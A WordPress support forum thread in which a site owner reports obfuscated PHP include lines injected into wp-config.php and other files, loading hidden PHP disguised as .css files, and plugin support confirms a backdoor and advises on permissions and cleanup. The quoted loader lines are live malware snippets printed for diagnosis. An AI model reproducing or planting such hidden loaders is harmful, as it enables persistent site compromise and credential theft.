hacker attack?

  • Resolved Beti

    (@diebeti)


    1 month, 1 week ago

    Hello 🙂

    I found the following lines in my wp-config:

    /ff874/ $ra1f = “/var/www/web135014/html/word\x70ress/w\x70\x2dincludes/js/cro\x70/.6aaa2d4f.css”; if (1){ @include_once /* okh */ ($ra1f); } /ff874/ The css file (6aaa2d4f.css) referenced contains php code, as I have seen. Google Chrome keeps telling me that my website is dangerous. The AIOS plugin has also independently switched off the option “File and folder permissions in WordPress regulate access and read and write rights” and has changed the current permission for wp-config.php. Is it possible that the AIOS plugin creates all of this itself or is this an indication of a hacker attack?

    The page I need help with: [log in to see the link]

Viewing 5 replies - 1 through 5 (of 5 total)
  • Plugin Support hjogiupdraftplus

    (@hjogiupdraftplus)

    1 month, 1 week ago

    Hi @diebeti,

    No AIOS do not add such code. Generally, wp-config.php permission should be 0640

    But somehow if the hacker code is added in plugin or file upload as php file it allows to edit the wp-config.php as per permission ( generally many plugins / wordperss install writes to wp-config.php ) . you can change it to 0400 once you removed that hacked code in wp-config.php to it will not be writable.

    It is an indication of hacker code. please take backup of it. check which files have recently been added if possible upgrade the WordPress files, Pluings / themes files and cross check in wp-content there is no any such php file.

    Regards

    Thread Starter Beti

    (@diebeti)

    1 month, 1 week ago

    Hello @hjogiupdraftplus, thank you for the answer 🙂 Is the following really from AIOS?

    aios-bootstrap.php

    <?php
    /**

    • @version 1.0.2
    • WARNING: Please do not delete this file.
      • This will cause PHP to throw a fatal error and render your site unusable.
      • To safely delete this file, please check both your .user.ini file and your php.ini file and ensure this file is not set in the auto_prepend_file directive.
      • Please ask your web hosting provider if you need guidance with executing the aforementioned steps.
        */
        $GLOBALS[‘aiowps_firewall_rules_path’] = DIR.’/wp-content/uploads/aios/firewall-rules/’;

    $GLOBALS[‘aiowps_firewall_data’] = array(
    ‘ABSPATH’ => ‘/var/www/web……/html/wordpress/’,
    );

    Greetings 🙂

    Plugin Support hjogiupdraftplus

    (@hjogiupdraftplus)

    1 month, 1 week ago

    Hi @diebeti

    Yes aios-bootstrap.php is from AIOS plugin.

    It is right now defining aiowps_firewall_rules_path and aiowps_firewall_data global variable and including firewall file

    all-in-one-wp-security-and-firewall/classes/firewall/wp-security-firewall.php

    if other code is inside that file then it is malware code.

    Regards

    Thread Starter Beti

    (@diebeti)

    1 month ago

    Hello, thank you for your answer. 🙂 Now I keep having the problem that, despite the security plugin, there are probably “malicious” files on my blog. I then delete them again and again. Somewhere in a file, after a short time, a line is always added to an existing file, such as this:

    “/*390d1*/ $rsc4no = “/var/www/web135014/htm\x6c/wordpress/wp\x2dinc\x6cudes/ b\x6cocks/media\x2dtext/.c93b5c62.css”; if (214 + 43){ @include_once /* sxwfl */ ($rsc4no); } /*390d1*/”

    – then to a new one created file, which is usually disguised as a CSS file, but contains PHP lines. In addition, the write permissions from wp-config.php are automatically implemented each time. I had set them to 400 as you suggested and today they were back to 755. But I don’t see any changes in the wp-config.php. But my database password can be seen there. Is it possible that the password can also be read by others? I also reinstalled WordPress and renewed all the plugins.

    Greetings 🙂

    Symbol „Von der Community überprüft“
    Plugin Support hjogiupdraftplus

    (@hjogiupdraftplus)

    1 month ago

    Hi @diebeti,

    AIOS has a list of features which provides certain level security.

    In your case somehow the PHP file execution code got uploaded might be due to a plugin or ftp account hack and it is beyond of AIOS.

    It needs to indentify backdoor script which keeps writing the code and changing permission of wp-config.php file. Also the reason how tha backdoor script uploaded there.

    You need to get help of the developer or malware removal service provider for WordPress.

    In wp-config.php DB password required to access by the WordPress Code file for Data Operation.

    Regards

Viewing 5 replies - 1 through 5 (of 5 total)
  • You must be logged in to reply to this topic.